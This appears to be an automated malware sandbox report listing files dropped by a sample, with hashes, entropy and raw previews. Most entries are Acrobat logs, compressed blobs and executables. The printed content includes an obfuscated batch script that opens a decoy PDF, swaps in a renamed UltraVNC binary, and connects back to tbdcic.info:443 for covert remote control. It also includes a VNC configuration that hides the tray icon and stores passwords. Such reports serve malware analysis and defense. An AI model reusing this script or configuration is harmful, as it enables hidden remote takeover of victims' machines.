                                                                                        Preview:SessionID=f986d65a-d315-4d8b-9fc9-80ab4ad625ea.1734957583743 Timestamp=2024-12-23T07:39:43:743-0500 ThreadID=7916 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=f986d65a-d315-4d8b-9fc9-80ab4ad625ea.1734957583743 Timestamp=2024-12-23T07:39:43:745-0500 ThreadID=7916 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=f986d65a-d315-4d8b-9fc9-80ab4ad625ea.1734957583743 Timestamp=2024-12-23T07:39:43:745-0500 ThreadID=7916 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=f986d65a-d315-4d8b-9fc9-80ab4ad625ea.1734957583743 Timestamp=2024-12-23T07:39:43:746-0500 ThreadID=7916 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=f986d65a-d315-4d8b-9fc9-80ab4ad625ea.1734957583743 Timestamp=2024-12-23T07:39:43:746-0500 ThreadID=7916 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):29752
                                                                                        Entropy (8bit):5.396000912067527
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:icbENIn5cbqlcbgIpLcbJcb4I5jcbKcbQIrxcbm2MRYcbItI0GcbD:8qnXopZ50rqMR2K0X
                                                                                        MD5:539E628726EF169D8CF51154016C897E
                                                                                        SHA1:0125320A89D228BACDD9B6AB2237CD39AB4EDFB2
                                                                                        SHA-256:354025791A2F172B7064D47C3DE037ADB2C5B630D2F9C12818E660BB386193F4
                                                                                        SHA-512:065F9F8FCAC739B72E5456C1DD21C60EA65D1997164F05C2BECAAEE3CED8C9A02A56BAC5BE7F6D9CA2006EBC3744EB1011F6A858D103BADCF20257125F9E40B2
                                                                                        Malicious:false
                                                                                        Preview:05-10-2023 10:01:02:.---2---..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 10:01:02:.Closing File..05-10-
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                        Category:dropped
                                                                                        Size (bytes):758601
                                                                                        Entropy (8bit):7.98639316555857
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                        MD5:3A49135134665364308390AC398006F1
                                                                                        SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                        SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                        SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                        Malicious:false
                                                                                        Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                        Category:dropped
                                                                                        Size (bytes):1407294
                                                                                        Entropy (8bit):7.97605879016224
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                                        MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                                        SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                                        SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                                        SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                                        Malicious:false
                                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                        Category:dropped
                                                                                        Size (bytes):386528
                                                                                        Entropy (8bit):7.9736851559892425
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                        MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                        SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                        SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                        SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                        Malicious:false
                                                                                        Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                        Category:dropped
                                                                                        Size (bytes):1419751
                                                                                        Entropy (8bit):7.976496077007677
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:/xA7owWLkwYIGNPMGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLkwZGuGZn3mlind9i4ufFXpAXkru
                                                                                        MD5:CA6B0D9F8DDC295DACE8157B69CA7CF6
                                                                                        SHA1:6299B4A49AB28786E7BF75E1481D8011E6022AF4
                                                                                        SHA-256:A933C727CE6547310A0D7DAD8704B0F16DB90E024218ACE2C39E46B8329409C7
                                                                                        SHA-512:9F150CDA866D433BD595F23124E369D2B797A0CA76A69BA98D30DF462F0A95D13E3B0834887B5CD2A032A55161A0DC8BB30C16AA89663939D6DCF83FAC056D34
                                                                                        Malicious:false
                                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                        File Type:PDF document, version 1.5 (zip deflate encoded)
                                                                                        Category:dropped
                                                                                        Size (bytes):605114
                                                                                        Entropy (8bit):7.931189302613814
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
                                                                                        MD5:A18D0E3EEEF0D6E099BAB52F8B041446
                                                                                        SHA1:4879750BEC07AA11629950310AF538E9A9D91D20
                                                                                        SHA-256:95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
                                                                                        SHA-512:6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
                                                                                        Malicious:false
                                                                                        Preview:%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5*.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j*$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi..*...T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.*-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.
                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                        File Type:DOS batch file, ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):1063
                                                                                        Entropy (8bit):5.595995239629694
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:gAULfghONR/OscFDuRCUKk7W26KkTczNJjE/tfW2tfnnLhA6MDxx/m:sLTR/OsSuQTI5rNJkflfnlLGx/m
                                                                                        MD5:38910F2D879725612BA1097E1F825C1E
                                                                                        SHA1:99F3C92122A6B333F94304DEED7D55D140BD9456
                                                                                        SHA-256:6D0A44B3563ADED3F056590B5A6FB848A9E17AF66F89F6C603068A379C372472
                                                                                        SHA-512:BBAB840AE212EB446B76B10201B137961B83CBA468A9938F3931241D54927A71CD0EEB689263267442D48FFCFF3EF402D11FBC06F6EA5836BCEEB2759C9D77A3
                                                                                        Malicious:false
                                                                                        Preview:@echo off.setlocal enabledelayedexpansion.set eK0qrm=nhost.set QJtV61=nne.set gQqfY2=co.set GkbpzI=exe.set Ps8o2E=Lom.set DYmP2A=pdf.set wSMj2e=raVNC.set KvwHVC=%COMPUTERNAME%.set bpAz1S=autore.set HZCo5u=%WINDIR%\Tasks\544191502.cmd.set Tnydkn=tbdcic.info.set fjmNEo=VPANJC.set lqHsNR=443.set RTbyfB=co.set MaNAw8=ct.set bxh0al=Ult.set gyoZzk=sync_browser.set YjXwLS=ini.timeout /t 1.copy "id2rlx.MxYNRd" "%HOMEPATH%\Downloads\%Ps8o2E%.%DYmP2A%" & start "" "%HOMEPATH%\Downloads\%Ps8o2E%.%DYmP2A%".timeout /t 1.taskkill /f /im %gyoZzk%.%GkbpzI% .timeout /t 2.copy "WPSela.LSZr7V" "%gyoZzk%.%GkbpzI%".timeout /t 1.copy "wFUH4p.aEmode" "%bxh0al%%wSMj2e%.%YjXwLS%".timeout /t 2.start "" %WINDIR%\Tasks\%gyoZzk%.%GkbpzI% .timeout /t 8.start "" %WINDIR%\Tasks\%gyoZzk%.%GkbpzI% -%bpAz1S%%gQqfY2%%QJtV61%%MaNAw8% -id:%KvwHVC%_%fjmNEo% -%gQqfY2%%QJtV61%%MaNAw8% %Tnydkn%:%lqHsNR%.timeout /t 2.copy "Nfe70s.UFVVkM" "%RTbyfB%%eK0qrm%.%GkbpzI%".timeout /t 4.:loop.if exist "%HZCo5u%" (. cmd /c "%HZCo5u%". tim
                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                        File Type:DOS batch file, ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):1063
                                                                                        Entropy (8bit):5.595995239629694
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:gAULfghONR/OscFDuRCUKk7W26KkTczNJjE/tfW2tfnnLhA6MDxx/m:sLTR/OsSuQTI5rNJkflfnlLGx/m
                                                                                        MD5:38910F2D879725612BA1097E1F825C1E
                                                                                        SHA1:99F3C92122A6B333F94304DEED7D55D140BD9456
                                                                                        SHA-256:6D0A44B3563ADED3F056590B5A6FB848A9E17AF66F89F6C603068A379C372472
                                                                                        SHA-512:BBAB840AE212EB446B76B10201B137961B83CBA468A9938F3931241D54927A71CD0EEB689263267442D48FFCFF3EF402D11FBC06F6EA5836BCEEB2759C9D77A3
                                                                                        Malicious:false
                                                                                        Preview:@echo off.setlocal enabledelayedexpansion.set eK0qrm=nhost.set QJtV61=nne.set gQqfY2=co.set GkbpzI=exe.set Ps8o2E=Lom.set DYmP2A=pdf.set wSMj2e=raVNC.set KvwHVC=%COMPUTERNAME%.set bpAz1S=autore.set HZCo5u=%WINDIR%\Tasks\544191502.cmd.set Tnydkn=tbdcic.info.set fjmNEo=VPANJC.set lqHsNR=443.set RTbyfB=co.set MaNAw8=ct.set bxh0al=Ult.set gyoZzk=sync_browser.set YjXwLS=ini.timeout /t 1.copy "id2rlx.MxYNRd" "%HOMEPATH%\Downloads\%Ps8o2E%.%DYmP2A%" & start "" "%HOMEPATH%\Downloads\%Ps8o2E%.%DYmP2A%".timeout /t 1.taskkill /f /im %gyoZzk%.%GkbpzI% .timeout /t 2.copy "WPSela.LSZr7V" "%gyoZzk%.%GkbpzI%".timeout /t 1.copy "wFUH4p.aEmode" "%bxh0al%%wSMj2e%.%YjXwLS%".timeout /t 2.start "" %WINDIR%\Tasks\%gyoZzk%.%GkbpzI% .timeout /t 8.start "" %WINDIR%\Tasks\%gyoZzk%.%GkbpzI% -%bpAz1S%%gQqfY2%%QJtV61%%MaNAw8% -id:%KvwHVC%_%fjmNEo% -%gQqfY2%%QJtV61%%MaNAw8% %Tnydkn%:%lqHsNR%.timeout /t 2.copy "Nfe70s.UFVVkM" "%RTbyfB%%eK0qrm%.%GkbpzI%".timeout /t 4.:loop.if exist "%HZCo5u%" (. cmd /c "%HZCo5u%". tim
                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):867840
                                                                                        Entropy (8bit):6.386550733462827
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
                                                                                        MD5:0F568F6C821565AB9FF45C7457953789
                                                                                        SHA1:F948A4C5E01A74B17D0F966615834BA76DC1BADC
                                                                                        SHA-256:CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
                                                                                        SHA-512:B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                        File Type:Generic INItialization configuration [admin]
                                                                                        Category:dropped
                                                                                        Size (bytes):858
                                                                                        Entropy (8bit):5.216893826927931
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:z/h28nCt2vMQg9KgJhuXNTxYgMei3MAKJDv:rh28nCF/KgJOr8eTxDv
                                                                                        MD5:7EB58E0D2316B8ECE029C804BF4BA8FA
                                                                                        SHA1:A2A8E2518D12A53CCFCAB925C124933172044D08
                                                                                        SHA-256:71203DB9D1722FA5B1B627BAA36FEAFC93B1E5F2F779413C84BD4686742A76F9
                                                                                        SHA-512:3415113B8CA2F79860DF7529CFBC18CBDC24B93B22723B9D34034A683B71906F8DCC20AA568ADF3F4649EB85FD7E8FDF8FDB34FE5A748E4AE7E36ACD2FC063AD
                                                                                        Malicious:false
                                                                                        Preview:[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=40..KeepAliveInterval=4..SocketKeepAliveTimeout=14000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0111C75FCAEB30BD2..passwd2=F2102C75FCAEB11BD2..
                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):1945368
                                                                                        Entropy (8bit):6.532894678367002
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
                                                                                        MD5:749B3A68B9C5325D592822EE7C2C17EC
                                                                                        SHA1:3EDE6BB2DF969432358A5883CF226971FDE8B7D4
                                                                                        SHA-256:F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                                                                                        SHA-512:B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\WPSela.LSZr7V, Author: Joe Security
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):867840
                                                                                        Entropy (8bit):6.386550733462827
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
                                                                                        MD5:0F568F6C821565AB9FF45C7457953789
                                                                                        SHA1:F948A4C5E01A74B17D0F966615834BA76DC1BADC
                                                                                        SHA-256:CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
                                                                                        SHA-512:B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                        File Type:PDF document, version 1.5 (zip deflate encoded)
                                                                                        Category:dropped
                                                                                        Size (bytes):605114
                                                                                        Entropy (8bit):7.931189302613814
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
                                                                                        MD5:A18D0E3EEEF0D6E099BAB52F8B041446
                                                                                        SHA1:4879750BEC07AA11629950310AF538E9A9D91D20
                                                                                        SHA-256:95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
                                                                                        SHA-512:6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
                                                                                        Malicious:false
                                                                                        Preview:%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5*.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j*$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi..*...T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.*-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.
                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):1945368
                                                                                        Entropy (8bit):6.532894678367002
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
                                                                                        MD5:749B3A68B9C5325D592822EE7C2C17EC
                                                                                        SHA1:3EDE6BB2DF969432358A5883CF226971FDE8B7D4
                                                                                        SHA-256:F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                                                                                        SHA-512:B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\sync_browser.exe, Author: Joe Security
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                        File Type:Generic INItialization configuration [admin]
                                                                                        Category:dropped
                                                                                        Size (bytes):858
